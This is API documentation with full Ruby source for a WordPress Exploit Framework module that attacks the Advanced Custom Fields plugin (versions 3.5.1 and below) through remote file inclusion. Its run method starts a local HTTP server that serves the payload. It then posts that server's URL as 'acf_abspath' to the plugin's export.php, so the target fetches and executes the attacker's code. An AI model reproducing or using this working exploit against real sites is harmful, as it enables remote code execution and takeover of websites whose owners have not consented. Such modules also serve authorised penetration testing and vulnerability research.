Class: Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpServer
Defined in:
lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ AdvancedCustomFieldsRemoteFileInclusion

Returns a new instance of AdvancedCustomFieldsRemoteFileInclusion.



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 7

# Builds the module: registers its metadata with the framework and declares
# the two operator-supplied options it needs.
#
# The metadata is the same as displayed by the framework's info command; the
# vulnerability only applies when the PHP ini directive "allow_url_include"
# is enabled, which is not the default (see the desc text below).
#
# Options registered:
#   rfi_host - address the module's own HTTP server is reachable on (required)
#   rfi_path - path requested back from that server; defaults to a random
#              8-letter string generated once, when this instance is created
def initialize
  super

  module_info = {
    name: 'Advanced Custom Fields Remote File Inclusion',
    desc: 'The Advanced Custom Fields plugin, in versions 3.5.1 and below, '\
          'allows for remote file inclusion and remote code execution via '\
          'the export.php script. This exploit only works when the PHP '\
          'option "allow_url_include" is enabled (disabled by default).',
    author: [
      'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
      'rastating'                                  # WPXF module
    ],
    references: [
      ['URL', 'http://secunia.com/advisories/51037/'],
      ['WPVDB', '6103']
    ],
    date: 'Nov 14 2012'
  }
  update_info(**module_info)

  host_option = StringOption.new(
    name: 'rfi_host',
    desc: 'The address of the host listening for a connection',
    required: true
  )
  # Default is evaluated here, once per instance, not per request.
  path_option = StringOption.new(
    name: 'rfi_path',
    desc: 'The path to access via the remote file inclusion request',
    default: Utility::Text.rand_alpha(8),
    required: true
  )
  register_options([host_option, path_option])
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 46

# Version check used by the framework's check command.
#
# Delegates to the shared readme-based fingerprint helper with the plugin
# slug and the version string '3.5.2'; how that helper interprets the
# version (first fixed release, per the desc text) is defined elsewhere.
#
# @return whatever check_plugin_version_from_readme returns
def check
  plugin_slug = 'advanced-custom-fields'
  reference_version = '3.5.2'
  check_plugin_version_from_readme(plugin_slug, reference_version)
end

#on_http_request(path, params, headers) ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 62

# Callback invoked by Net::HttpServer for every request it receives while
# the server started in #run is up.
#
# The request details are ignored: every request gets the same response,
# the encoded payload. Restricting responses to the expected rfi_path would
# be stricter, but that is not what this version does.
#
# @param path [Object] request path (unused)
# @param params [Object] request parameters (unused)
# @param headers [Object] request headers (unused)
# @return the value of payload.encoded
def on_http_request(path, params, headers)
  response_body = payload.encoded
  response_body
end

#plugin_url ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 42

# URL of the plugin's directory on the target, built from the framework's
# plugins base URL and the plugin slug.
#
# @return [String] normalized URL of the advanced-custom-fields plugin dir
def plugin_url
  plugins_base = wordpress_url_plugins
  normalize_uri(plugins_base, 'advanced-custom-fields')
end

#rfi_host ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 50

# Operator-supplied address the module's HTTP server is reachable on.
#
# @return the normalized value of the 'rfi_host' option
def rfi_host
  option_name = 'rfi_host'
  normalized_option_value(option_name)
end

#rfi_path ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 54

# Path the target is expected to request from the module's HTTP server.
#
# @return the normalized value of the 'rfi_path' option
def rfi_path
  option_name = 'rfi_path'
  normalized_option_value(option_name)
end

#rfi_url ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 58

# Plain-http URL pointing back at the module's own HTTP server.
#
# The host and path are option values and are inserted verbatim (no
# escaping); the port comes from the HTTP server mixin. The scheme is
# always http, so the callback is unencrypted.
#
# @return [String] "http://<rfi_host>:<bind port>/<rfi_path>"
def rfi_url
  format('http://%s:%s/%s', rfi_host, http_server_bind_port, rfi_path)
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 70

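# Runs the module: starts the local HTTP server, sends the single POST to
# export.php, reports the outcome and always stops the server again.
#
# Two fixes over the previous version:
#   * stop_http_server is now in an ensure, so the server thread is not left
#     running if execute_post_request raises.
#   * the nil check on the response comes before the response is used; the
#     old code read res.code first and only then tested `res &&`, so the
#     guard could never take effect.
#
# A 500 response, or a body mentioning allow_url_include, is treated as the
# PHP directive being disabled (the default configuration), which is the
# condition that blocks this issue.
#
# @return [Boolean] false if the parent run refuses, no response arrives, or
#   allow_url_include appears disabled; true otherwise
def run
  return false unless super

  # Argument meaning is defined by the Net::HttpServer mixin — not visible
  # here; presumably "run in background" — confirm against the mixin.
  start_http_server(true)
  begin
    emit_info 'Executing request...'
    res = execute_post_request(
      url: vulnerable_url,
      body: {
        'acf_abspath' => rfi_url
      }
    )
  ensure
    # Always tear the server down, even if the request raised.
    stop_http_server
  end

  # execute_post_request may hand back nil (the original guarded for it);
  # bail out before touching res.code / res.body.
  if res.nil?
    emit_error 'No response received from the target'
    return false
  end

  # Second argument presumably marks verbose-only output — confirm.
  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  if res.code == 500 || res.body.to_s.match?(/allow_url_include/)
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  emit_success "Result: #{res.body}" if res.code == 200 && !res.body.to_s.strip.empty?

  true
end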

#vulnerable_url ⇒ Object



# File 'lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb', line 66

# URL of the plugin's export.php script, the endpoint #run posts to.
#
# @return [String] plugin_url joined with core/actions/export.php
def vulnerable_url
  script_segments = %w[core actions export.php]
  normalize_uri(plugin_url, *script_segments)
end